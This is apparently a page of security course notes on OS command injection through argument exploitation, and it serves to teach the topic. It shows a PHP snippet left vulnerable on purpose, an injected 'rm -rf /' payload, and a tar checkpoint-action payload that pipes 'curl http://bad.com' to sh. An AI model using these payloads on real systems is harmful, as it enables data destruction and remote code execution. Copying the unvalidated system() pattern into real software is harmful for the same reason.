Notes - MCS
Analysis and Exploration of Vulnerabilities
Notes - MCS
Analysis and Exploration of Vulnerabilities
  • Analysis and Exploration of Vulnerabilities
  • Vulnerabilities
    • Vulnerabilities
      • CIA Triad
      • Vulnerability Sources
    • Vulnerability Tracking
    • Vulnerability Disclosure
  • Vulnerability Assessment of Networked Systems
    • Vulnerability Research
    • Vulnerability Assessment
    • Penetration Test
      • Scope
    • Types of Assessments
    • Vulnerability Management Life Cycle
  • Enumeration and Information Leakage
    • Network access
    • Information leakage
    • Errors
    • Web Sources and Support Files
    • Cookies
    • Ports
    • Banners
    • OS Fingerprinting
  • Injection
    • CWE-74
    • How it works
    • Common Pitfalls
    • CWE-89 SQL Injection
    • Using SQL
    • Things to consider
    • The NULL plate
    • SQLi types
    • SQL Injection - Avoiding
    • CWE-78 OS Command Injection
    • Command Override
    • Argument Exploitation
    • GTFOBins and LOLBAS
    • Environmental Variables
    • Parameter Expansion
    • Code Injection - CWE-94
    • Avoiding OS Injection
  • Broken Authentication
    • OWASP A2
    • HTTP Basics
    • HTTP Communication
    • Authentication
    • Authentication Flow State
    • Referer Header
    • SESSION ID
    • Cookies (RFC 6265)
    • JWT - JSON Web Tokens
  • XSS Cross Site Scripting
    • Prevalence and Detectability
    • Reflected XSS
    • Stored XSS
    • DOM XSS
    • Cross Site Request Forgery
    • Avoiding XSS
    • Same Origin Policy
  • Concurrency
    • Concurrency
    • CWE-361 - 7PK - Time and State
    • Basic Time Related CWEs
      • CWE-362 – Race Condition
    • Serializability
    • Database ACID characteristic
    • State Related CWEs
    • Basic Side Effects Related CWEs (Covert Channel)
    • Covert Timing Channel
    • Meltdown Type
  • Buffers
    • Buffer Overflow
    • Popularity decline
    • Potentially Vulnerable Software
    • Dominant prevalence
    • Vulnerabilities in languages (mostly C/C++)
    • Why? Memory Structure 101
    • CWE-120 Classic Overflow
      • Practical Examples
    • Stack Based Vulnerabilities
    • Stack Smashing
    • Countermeasures
    • ROP
Powered by GitBook
On this page
  • Examples
  • 1.
  • 2.
  • tar
  1. Injection

Argument Exploitation

The application runs the program as part of normal operation.

  • Example: create a backup of a database to a compressed file.

A crafted payload may execute user-controlled commands before or after the expected program, exploiting the tool arguments.

  • The programs will mostly execute.

  • But other programs may be called.

Examples

1.

<?php
    $host = $_POST["hostname"];
    $command = 'ping -c 3' . $host;
    system($command);
?>

The developer expects an IP address or hostname.

  • But doesn't do any kind of validation.

Custom payload can inject commands: hostname=localhost; rm -rf /

  • Result is 2 commands: ping -c localhost; rm -rf /

2.

The application asks user for the name of the backup file and backups a home directory:

tar -jcf user_backup_name.tar.bz2 /home/user

A user provides the following name:

.tar.bz2 --checkpoint=1 --checkpoint-action=exec=‘curl
http://bad.com|sh’ /etc/issue; #

which results in the following command:

tar -jcf user_.tar.bz2 --checkpoint=1 --checkpoint-
action=exec=‘curl http://bad.com|sh’ /etc/issue; #
/home/user

tar

The tar tool creates compressed files from archives, folders, and generic data.

Because the process can take a long time, it allows for checkpoints where actions are executed, usually to notify users.

Each every NUMBERth record executes a checkpoint action.

The checkpoint action is:

  • Get a file from http://bad.com

  • Execute the file as a bash script

Last updated 1 year ago